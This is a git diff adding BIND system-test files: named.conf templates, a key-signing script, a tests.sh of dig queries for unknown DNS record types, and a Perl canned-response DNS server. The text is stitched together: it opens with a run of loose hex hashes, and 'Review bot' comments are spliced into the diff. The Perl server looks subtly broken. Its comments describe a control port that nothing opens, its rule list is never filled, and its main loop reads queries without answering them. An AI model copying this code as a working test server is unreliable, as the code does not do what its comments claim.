bf6d0c26891be05378f214def3fb68c9 + 
37977a8e91dff2af6c33d5264514a940 + 1ed00d47d8b2173f7fe12be2433359e9 + c1e455b69405f84d397ce89ecf41598c + 34ec2d2c15326fca242f48edb6741e8a + 9aee351f449c05697b8005aeea6679cd + eef281ca22a32cea717a769af48ff7e3 + a46a9796b86c5c5ffd71449d42a46d89 + 0ab3696005c0132efdc24d97e6c78af5 + 50a3e0c475e8f4ecc69c9e8da9ba494a + 0eaddf1adaa5606287400772bb205ee5 + 216e812502993de510a88db1b12884bb + 83020dc5372097e1e9c323ad2ee0d811 + e4c6161e086f471d1cd0e5dad9657145 + c620f78edf98dc4edabaf82acdd472fb + 7251f17fc354c824882ac8529aee9183 + 6a80b89efd006d234f5cfa9e486317ca + 6433457937ec50b6c1efdf55b0776d29 + b8c36f7067ecea41d62b7e57d7c2c12f + eaff83380cb96423afa0ba51da333fee + df3969f7e6095893e99714d55409f266 + d85edda8a6677f319eed020f20ce41a0 + 3337d42a1c1fce7c26c951a6c8b12834 + 3375e3bf99969188e0aaa485749dd92f + e14ce8882b3b4cda3c7e7fbc08702407 + f057c9c2ae0ec540e553adc118d9afd5 + 1aef7303c3a128d01e432d292fb1510a + 29979e4028a7f02869397c73b571fa3f + 84a09a9cb70cc52c36cec79d3d533111 + 3594f1c842e75c87c0a79a745ad2b26f + 7b673cb57790b0b0734e399aa0a835f3 + ff711f45bff3cf6b97cdb74a5a1b53f9 + cdc0547f04c5076d20b178ab4d01465d + 9b96e23c28a269a4786fa7c33fffcfcd + ab07b8cd88e7aa3cb670d9301d535fb4 + 2ecf9b85b0d8a7431a2cb1237f2899af + 67e1cf09819e01e1cbb2edab0cd1ae2f + c6e07e7b194ee18f8821d144dccc49d0 + 550e6afe464fdc7ed36903ab42a2bfda + ee5faf95b909742e3f30d567d09b928a + 61e23b30970e8aef268fd27cc1a76bae + 51e95eba7a04cc574db34127f41f48ad + 0f60f3cb522de070b533c0b0060275e3 + 00d767b7f767c4aa3fa465dc24b84f2c + fd8ad4a61038d225ca4dc038201c8d09 + 4ea1b9443338a351d9bc43fa73059eb3 + c2c173a5647046441dc3ad6f71fe1a37 + e90095b6d1799e5d749e1953417477b0 + 70a2465efbed1a5267a9aa4ec2fd10b6 + 09039690fbcf9ea57e8758031bce78b8 + adf94c539753e35de5e8e300a527e7ec + 9c04e3b6e7e56f86f32400b25895c90a + d3e03ca49226548f6808a70081cd75d9 + 9bb561da5390f2d3418c4079311549f8 + 9e7e4e6539ac904756a7557de633c817 + 9df1b9b98c8ac5763c3854ee0743ef60 + 0bbb4f698fac7982b5944e81de5b8490 + 3de5d692e00a390291a4fd85e6080cee + 
16b5ac1dc70348f4f037f7c3a87e003a + f3ecbb184ad9e8f0802e66748e3cbaa7 + 3d2864242278a7c12f5a741fa4a2bdd6 + 5302ddb14dc2f466ff960082e4281593 + 22115fdae1f8022cbb1f58df88cc724f + ce517512f87bcf4dd7eb1bd5dda30baa + e2cddfe95059f19680c51089f4effb3c + 6b8bc66cbb5b91574d352db346c260ba + 58bbd6c1ea29ebe4d03335b3e7b34b2d + a5ae1c69cebc4db7822752ac827af893 + 4c9eff227b72844626bb97adcfe1dd7a + 4407320c3d81c136759f5df02fb50719 + b5d7078f15cbd37d25a2f9c388e98ea4 + d33cda3977a886b97d607b2ff1d564e2 + b9d6a044b40fb5ebf0b46ed087287f9f + a0a9d4382c98965004011815efcc28ec + d159d68ad96932a35fdea0efe3ceb317 + cc537a55e7464b066a6fda767f872ea0 + 2c12ff8c89686236273ba562e4ec6fcf + 0e166190814dbc08dd30654a84db902f + cbfbda00c09bb4ef56a3a54139fb2306 + 18426675d6661866ef870e26daa0f275 + e5c680ea4b8aa5cc048d1f4c93ce3a28 + ed6d2b675336cb20a00ff06ad6cf40ed + 779b93e3bcb71227bfb374f58c96d69a + 874008d82295316ebd6394dafc393922 + de1719dae26a1a309cc4206535c88a55 + da7c4a0f7cfa29a9d0f21bb9dc4d8448 + fcb5d807d37002769fd786525fc5f365 + e2ec2dacea3287f0d203b3df87a3cb09 + 562fcb8b45bb6ac955ff94c4b72f3b18 + f0df78648b5a339a0bccbeb35d8e5bd9 + cf58d1d77e957790f18e2bf6018e3208 + 0bca6bd34efec9760518c9e65416dbd9 + ec0e7d9f242892fc45b66e862298fbab + 0d1855b762d1c505072d06fab0fa99cc + 518d8830e6fa0aef5977e116606874df + ef1756ed555798daaa3fe8078a19e892 + b94db166ba6a99c63c79f1f62af6a319 + 601cc304ca52a8883ecfc3647c069b83 + 2169d91bce1145995b514ca73d70edc3 + 4a3887e5217279251946241447b7aac9 + 5dde21faf82ac2c044b0013e7577877a + 8ed5320f8e874058d96eaac621566a09 + 94d762ea58c9a3a9029645273d27af53 + 8215b3cf672fab49838d87caab2a91c9 + b80e8e80306f73143a00d6af61037d19 + 6e593d585892835bf6b87ece1ef5d439 + 780beb20cb674f5b885cc368ebaff8d4 + ba43bca4962a09d6dcb771baef7e3df9 ) diff --git a/bin/tests/system/unknown/ns1/named.conf.in b/bin/tests/system/unknown/ns1/named.conf.in new file mode 100644 index 0000000..a240cbe --- /dev/null +++ b/bin/tests/system/unknown/ns1/named.conf.in 
@@ -0,0 +1,68 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+};
+
+view "in" {
+ zone "example." {
+ type primary;
+ file "example-in.db";
+ };
+
+ zone "broken1." {
+ type primary;
+ file "broken1.db";
+ };
+
+ zone "broken2." {
+ type primary;
+ file "broken2.db";
+ };
+
+ zone "broken3." {
+ type primary;
+ file "broken3.db";
+ };
+
+ zone "broken4." {
+ type primary;
+ file "broken4.db";
+ };
+
+ zone "broken5." {
+ type primary;
+ file "broken5.db";
+ };
+};
+
+view "class10" class10 {
+ zone "." class10 {
+ type hint;
+ file "class10.hints";
+ };
+
+ zone "example." class10 {
+ type primary;
+ file "example-class10.db";
+ };
+};
diff --git a/bin/tests/system/unknown/ns2/named.conf.in b/bin/tests/system/unknown/ns2/named.conf.in
new file mode 100644
index 0000000..01361c7
--- /dev/null
+++ b/bin/tests/system/unknown/ns2/named.conf.in
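Review bot: Zone `broken5.` is declared in view "in", but nothing visible in this commit queries it: the tests.sh check "querying for SOAs of zone that should have failed to load" iterates only over `for i in 1 2 3 4`. If broken5.db is also meant to fail loading, extend that loop to `for i in 1 2 3 4 5`; if it is meant to load, a one-line comment above the zone saying what it exercises would help. broken5.db is not in view here, so its intent is inferred.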
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+};
+
+view "in" {
+ zone "example." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "example-in.bk";
+ };
+};
diff --git a/bin/tests/system/unknown/ns3/named.conf.in b/bin/tests/system/unknown/ns3/named.conf.in
new file mode 100644
index 0000000..828d667
--- /dev/null
+++ b/bin/tests/system/unknown/ns3/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+};
+
+view "in" {
+ zone "example." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example-in.bk";
+ };
+};
diff --git a/bin/tests/system/unknown/ns3/sign.sh b/bin/tests/system/unknown/ns3/sign.sh
new file mode 100644
index 0000000..76063a7
--- /dev/null
+++ b/bin/tests/system/unknown/ns3/sign.sh
@@ -0,0 +1,21 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=example
+rm -f K${zone}.+*+*.key
+rm -f K${zone}.+*+*.private
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone)
diff --git a/bin/tests/system/unknown/setup.sh b/bin/tests/system/unknown/setup.sh
new file mode 100644
index 0000000..9b65d05
--- /dev/null
+++ b/bin/tests/system/unknown/setup.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+
+(cd ns3; $SHELL -e sign.sh)
diff --git a/bin/tests/system/unknown/tests.sh b/bin/tests/system/unknown/tests.sh
new file mode 100644
index 0000000..e324fae
--- /dev/null
+++ b/bin/tests/system/unknown/tests.sh
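Review bot: In sign.sh, `keyname` is assigned by both `$KEYGEN` calls and never read, so the ZSK name from the first call is overwritten by the KSK name; the capture appears to serve only to swallow keygen's output. Use distinct names, e.g. `zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)` and `ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone)`, or redirect to `/dev/null` instead of capturing. A comment such as `# generate a ZSK and a KSK for the inline-signed copy of the zone on ns3` above the two calls would explain why two keys are created.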
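Review bot: In setup.sh, `(cd ns3; $SHELL -e sign.sh)` still runs sign.sh when `cd ns3` fails, and sign.sh begins by removing `K${zone}.+*+*.key` and `K${zone}.+*+*.private` from whatever directory it is started in. Chain the two with `&&`: `(cd ns3 && $SHELL -e sign.sh)`. The script also runs without `set -e`, so a failing `copy_setports` does not stop setup; whether the harness catches that elsewhere is not visible in this hunk.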
@@ -0,0 +1,229 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="-p ${PORT}" + +n=$((n+1)) +echo_i "querying for various representations of an IN A record ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 11 12 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 a$i.example a in > dig.out.$i.test$n || ret=1 + echo 10.0.0.1 | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of an IN TXT record ($n)" +for i in 1 2 3 4 5 6 7 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 txt$i.example txt in > dig.out.$i.test$n || ret=1 + echo '"hello"' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of an IN TYPE123 record ($n)" +for i in 1 2 3 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 unk$i.example type123 in > dig.out.$i.test$n || ret=1 + echo '\# 1 00' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for NULL record ($n)" +ret=0 +$DIG +short $DIGOPTS @10.53.0.1 null.example null in > dig.out.test$n || ret=1 +echo '\# 1 00' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "querying for empty NULL record ($n)" +ret=0 +$DIG +short $DIGOPTS @10.53.0.1 empty.example null in > dig.out.test$n || ret=1 
+echo '\# 0' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "querying for various representations of a CLASS10 TYPE1 record ($n)" +for i in 1 2 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 a$i.example a class10 > dig.out.$i.test$n || ret=1 + echo '\# 4 0A000001' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of a CLASS10 TXT record ($n)" +for i in 1 2 3 4 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 txt$i.example txt class10 > dig.out.$i.test$n || ret=1 + echo '"hello"' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of a CLASS10 TYPE123 record ($n)" +for i in 1 2 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 unk$i.example type123 class10 > dig.out.$i.test$n || ret=1 + echo '\# 1 00' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for SOAs of zone that should have failed to load ($n)" +for i in 1 2 3 4 +do + ret=0 + $DIG $DIGOPTS @10.53.0.1 broken$i. 
soa in > dig.out.$i.test$n || ret=1 + grep "SERVFAIL" dig.out.$i.test$n > /dev/null || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "checking large unknown record loading on primary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.1 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF -s large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "checking large unknown record loading on secondary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.2 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF -s large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "stop and restart secondary" +stop_server ns2 +start_server --noclean --restart --port ${PORT} ns2 + +# server may be answering queries before zones are loaded, +# so retry a few times if this query fails +n=$((n+1)) +echo_i "checking large unknown record loading on secondary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.2 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF -s large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "checking large unknown record loading on inline secondary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 +tcp +short large.example TYPE45234 > dig.out.test$n || { ret=1 ; echo_i "dig failed" ; } +$DIFF large.out dig.out.test$n > /dev/null || { ret=1 ; echo_i "$DIFF 
failed"; } +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "stop and restart inline secondary" +stop_server ns3 +start_server --noclean --restart --port ${PORT} ns3 + +# server may be answering queries before zones are loaded, +# so retry a few times if this query fails +n=$((n+1)) +echo_i "checking large unknown record loading on inline secondary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.3 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that '"'"\\#"'"' is not treated as the unknown escape sequence ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 +tcp +short txt8.example txt > dig.out.test$n +echo '"#" "2" "0145"' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that 'TXT \# text' is not treated as the unknown escape sequence ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 +tcp +short txt9.example txt > dig.out.test$n +echo '"#" "text"' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that 'TYPE353 \# cat' produces 'not a valid number' ($n)" +ret=0 +$CHECKZONE nan.bad zones/nan.bad > check.out 2>&1 +grep "not a valid number" check.out > /dev/null || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/unknown/zones/nan.bad b/bin/tests/system/unknown/zones/nan.bad new file mode 100644 index 0000000..4381f88 --- /dev/null +++ b/bin/tests/system/unknown/zones/nan.bad 
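Review bot: The four `for try in 0 1 2 3 4 5 6 7 8 9` retry loops in tests.sh write to and compare `dig.out.$i.test$n`, but `$i` is not the loop variable there; it is left over from the preceding `for i in 1 2 3 4` loop, so the output file name carries a stale index. Use `dig.out.test$n` (or `dig.out.$try.test$n`) in both the `$DIG` redirect and the `$DIFF` line of each loop, as the non-looping inline-secondary check already does. The `txt8.example` and `txt9.example` queries also run `$DIG` without `|| ret=1`, unlike every other query in the file, so a failed dig there is only caught indirectly by the diff; append `|| ret=1` to both lines.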
@@ -0,0 +1,12 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 IN TYPE353 \# cat 010101010101010101
diff --git a/bin/tests/system/upforwd/ans4/ans.pl b/bin/tests/system/upforwd/ans4/ans.pl
new file mode 100644
index 0000000..75ab3ed
--- /dev/null
+++ b/bin/tests/system/upforwd/ans4/ans.pl
@@ -0,0 +1,363 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# This is the name server from hell. It provides canned +# responses based on pattern matching the queries, and +# can be reprogrammed on-the-fly over a TCP connection. +# +# The server listens for control connections on port 5301. +# A control connection is a TCP stream of lines like +# +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# +# There can be any number of patterns, each associated +# with any number of response RRs. Each pattern is a +# Perl regular expression. +# +# Each incoming query is converted into a string of the form +# "qname qtype" (the printable query domain name, space, +# printable query type) and matched against each pattern. +# +# The first pattern matching the query is selected, and +# the RR following the pattern line are sent in the +# answer section of the response. +# +# Each new control connection causes the current set of +# patterns and responses to be cleared before adding new +# ones. +# +# The server handles UDP and TCP queries. Zone transfer +# responses work, but must fit in a single 64 k message. +# +# Now you can add TSIG, just specify key/key data with: +# +# /pattern <key> <key_data>/ +# name ttl type rdata +# name ttl type rdata +# +# Note that this data will still be sent with any request for +# pattern, only this data will be signed. Currently, this is only +# done for TCP. 
+ + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.4"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +print "listening on $server_addr:$localport.\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +#my @answers = (); +my @rules; +sub handleUDP { + my ($buf) = @_; + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + $packet->header->qr(1); + $packet->header->aa(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + while (my $rr = $packet->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data) = split(/ /,$pattern); + print "[handleUDP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && defined($key_data)) { + # Sign the packet + 
print " Signing the response with " . + "$key_name/$key_data\n"; + my $tsig = Net::DNS::RR-> + new("$key_name TSIG $key_data"); + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {}; + $packet->{"header"}{"arcount"} += 1; + if (defined($prev_tsig)) { + my $rmac = pack('n H*', + $prev_tsig->mac_size, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } + + $packet->sign_tsig($tsig); + } + last; + } + } + #$packet->print; + + return $packet->data; +} + +# namelen: +# given a stream of data, reads a DNS-formatted name and returns its +# total length, thus making it possible to skip past it. +sub namelen { + my ($data) = @_; + my $len = 0; + my $label_len = 0; + do { + $label_len = unpack("c", $data); + $data = substr($data, $label_len + 1); + $len += $label_len + 1; + } while ($label_len != 0); + return ($len); +} + +# packetlen: +# given a stream of data, reads a DNS wire-format packet and returns +# its total length, making it possible to skip past it. +sub packetlen { + my ($data) = @_; + my $q; + my $rr; + + my ($header, $offset) = Net::DNS::Header->parse(\$data); + for (1 .. $header->qdcount) { + ($q, $offset) = Net::DNS::Question->parse(\$data, $offset); + } + for (1 .. $header->ancount) { + ($rr, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + for (1 .. $header->nscount) { + ($rr, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + for (1 .. $header->arcount) { + ($rr, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + return $offset; +} + +# sign_tcp_continuation: +# This is a hack to correct the problem that Net::DNS has no idea how +# to sign multiple-message TCP responses. 
Several data that are included +# in the digest when signing a query or the first message of a response are +# omitted when signing subsequent messages in a TCP stream. +# +# Net::DNS::Packet->sign_tsig() has the ability to use a custom signing +# function (specified by calling Packet->sign_func()). We use this +# function as the signing function for TCP continuations, and it removes +# the unwanted data from the digest before calling the default sign_hmac +# function. +sub sign_tcp_continuation { + my ($key, $data) = @_; + + # copy out first two bytes: size of the previous MAC + my $rmacsize = unpack("n", $data); + $data = substr($data, 2); + + # copy out previous MAC + my $rmac = substr($data, 0, $rmacsize); + $data = substr($data, $rmacsize); + + # try parsing out the packet information + my $plen = packetlen($data); + my $pdata = substr($data, 0, $plen); + $data = substr($data, $plen); + + # remove the keyname, ttl, class, and algorithm name + $data = substr($data, namelen($data)); + $data = substr($data, 6); + $data = substr($data, namelen($data)); + + # preserve the TSIG data + my $tdata = substr($data, 0, 8); + + # prepare a new digest and sign with it + $data = pack("n", $rmacsize) . $rmac . $pdata . 
$tdata; + return Net::DNS::RR::TSIG::sign_hmac($key, $data); +} + +sub handleTCP { + my ($buf) = @_; + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + $packet->header->qr(1); + $packet->header->aa(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + my $signer; + while (my $rr = $packet->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + + my @results = (); + my $count_these = 0; + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data) = split(/ /,$pattern); + print "[handleTCP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + $count_these++; + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && defined($key_data)) { + # sign the packet + print " Signing the data with " . + "$key_name/$key_data\n"; + + my $tsig = Net::DNS::RR-> + new("$key_name TSIG $key_data"); + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. 
+ $packet->{"compnames"} = {}; + $packet->{"header"}{"arcount"} += 1; + if (defined($prev_tsig)) { + my $rmac = pack('n H*', + $prev_tsig->mac_size, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } + + $tsig->sign_func($signer) if defined($signer); + $packet->sign_tsig($tsig); + $signer = \&sign_tcp_continuation; + + my $copy = + Net::DNS::Packet->new(\($packet->data)); + $prev_tsig = $copy->pop("additional"); + } + #$packet->print; + push(@results,$packet->data); + $packet = new Net::DNS::Packet(\$buf, 0); + $packet->header->qr(1); + $packet->header->aa(1); + } + } + print " A total of $count_these patterns matched\n"; + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + } + sleep(1); + } +} diff --git a/bin/tests/system/upforwd/clean.sh b/bin/tests/system/upforwd/clean.sh new file mode 100644 index 0000000..14a7d29 --- /dev/null +++ b/bin/tests/system/upforwd/clean.sh 
